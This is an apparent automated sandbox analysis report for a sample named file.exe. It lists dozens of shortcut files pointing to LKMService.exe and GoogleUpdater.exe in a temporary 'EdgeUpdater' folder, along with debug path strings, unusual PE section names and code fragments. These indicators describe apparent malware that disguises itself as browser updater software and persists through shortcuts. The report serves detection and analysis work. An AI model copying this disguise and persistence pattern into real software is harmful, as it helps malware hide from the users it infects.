Source: LKMService_d5b565aee0b842f89c22c5f172678df9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_aa8be52a868740eab8f8ec82641ac0c1.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f619a40d28e44231bbc0b75adc7e6593.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3a7884e208224a6c873f89801ccde078.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_70b4bf6c89434abb9c4a92d4a3107a31.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a37d9ccfb0194adf8213dc3f6997f78f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ec7e774008154f3596c8e5c3ca65b43a.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\GoogleUpdater.exe
Source: LKMService_8b0b963caf834d029f35df17c1c436c7.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1bc86309aad64beaaba50da47f1fe248.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7a283f2dc44047f9b90f76f7687c84db.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3334419e53b3488ca85ae4de076f47dc.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_621b8830c943464c9d47e42d99b46857.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a0df83e3640e4d8d8bc92cc51336f2f5.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1260347513fa42eb8dbca954b1f9766f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_30649bb19ccb493bae273224706f8bba.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7b11985b0f4a44efbcfa9ebcdda85610.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f259adaf5ff645509c195bf263dfd55e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c894375b99af48eb88116328de9ffb98.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_856eb967065a4a3faa5cc998ae92f005.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_0f1fdcd72fa2443cb400c03502902fe9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8127c9e300df4816a3f8c0b347934bf0.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_e64ab677b62d4831a2902f3e6bff49df.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d97d239314814309aa82de22ff2626e0.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d9ae47459b854ee78156fea739ee2eba.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f398b917ebdf42d684e3df08d449596d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d550e8040e9f44f19bffddc3e8e06d5e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_28a5b517ff724da4be16ea4aaf5a357c.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ed539e9b377a47aebbf43d3ea0cb839e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7d29b77eb5544048bf84a48c0bc966be.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a97a4cd7e177496cae1d18f2d60edeb6.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_fff188210d924c868774a26b37b1f9c9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_acbb346df900467ebd8c2c0ce13844f9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_2d07a0547ac04ab9af7372ee910ba6b1.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_b87af243048a4cb58e7fbbcc09d4d0bb.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_687a9749c9a44df689e436ec246c5fcc.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_92fa881b504c497db058025dd6cb3bc4.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7172ee7a982744218b205a6832554ab3.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_17b0682e31094ae8b61542e0fc483319.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8f3c4b00bddc456e9c6e890ed0339b68.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_111bb590f9e24471b247ca4b4d7fd194.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_270b1265d8e74892bac3d731d24190c0.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_59312c45173e49bd8b855b176d5a495f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_284cd24aa4e1493cb8422375a300e535.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_75bc3afdb6384591b03d648ecbb02287.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c460e1bb0908400c8719e2ff6efc6472.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_255ec7c5f6124168899ab52eb1fb3db9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ee6262db977148f9b6ce41041a0fbdf7.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_46234ffc04244b23ac4dc3e0979a0b7d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_41851dcfce50420bb4154e63f25f2a8e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_5f419d2562814795914a60f7e574128b.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ba60f2e1542943c49cb63fcb463703a8.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9dac438bfec04a60812adddf7761318f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb=" source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbTM source: LKMService.exe, 00000004.00000002.2368522313.0000000001193000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbu source: LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdbon n source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\LKSM.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 3{C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.PDB source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb_+f source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbL}) source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdbs' source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\LKSM.pdb source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001118000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m0C:\Windows\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb( source: LKMService.exe, 00000004.00000002.2368522313.0000000001118000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb`V source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdbu source: LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbt source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.PDB0 source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbrL source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.PDBgi~m source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\LKSM.pdbo+v source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb35$ source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdbte source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor$ source: GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: {%%.pdb source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdbSe source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\DEV\C#\WinAppC\WinApp\WinApp\obj\Release\LKSM.pdbN source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr
Source:	Binary string: \??\C:\Windows\System.Core.pdby source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbV source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb%&, source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor4 source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: m0C:\Windows\mscorlib.pdby source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb ~, source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: osymbols\dll\mscorlib.pdbLb source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb-Vs source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb9 source: GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: LKSM.pdb< source: WER951D.tmp.dmp.17.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdbs source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tLKSM.pdbpo source: LKMService.exe, 0000000F.00000002.2519054896.00000000007B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdbps source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\LKSM.pdbpdbKSM.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: LKSM.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbe6 source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@=B source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbo source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb/# source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbti source: WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbe source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbY= source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbt source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb# source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001193000.00000004.00000020.00020000.00000000.sdmp, WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: System.pdb4 source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\LKSM.pdb3 source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\DEV\C#\WinAppC\WinApp\WinApp\obj\Release\LKSM.pdb source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb**# source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr

Source: file.exe

Static PE information: 0xD12A4096 [Fri Mar 14 19:46:30 2081 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: ."Rv

Source: file.exe	Static PE information: section name: .wyi
Source: file.exe	Static PE information: section name: ."Rv
Source: LKMService.exe.0.dr	Static PE information: section name: .wyi
Source: LKMService.exe.0.dr	Static PE information: section name: ."Rv
Source: GoogleUpdater.exe.2.dr	Static PE information: section name: .wyi
Source: GoogleUpdater.exe.2.dr	Static PE information: section name: ."Rv

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF5EE7 pushfd ; retf	0_2_04DF5EF9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF7FA8 push esp; iretd	0_2_04DF7FA9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04DF7F48 pushad ; iretd	0_2_04DF7FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B5EE7 pushfd ; retf	2_2_049B5EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 2_2_049B7F48 pushad ; iretd	2_2_049B7FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E7F48 pushad ; iretd	3_2_050E7FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E7FA8 push esp; iretd	3_2_050E7FA9
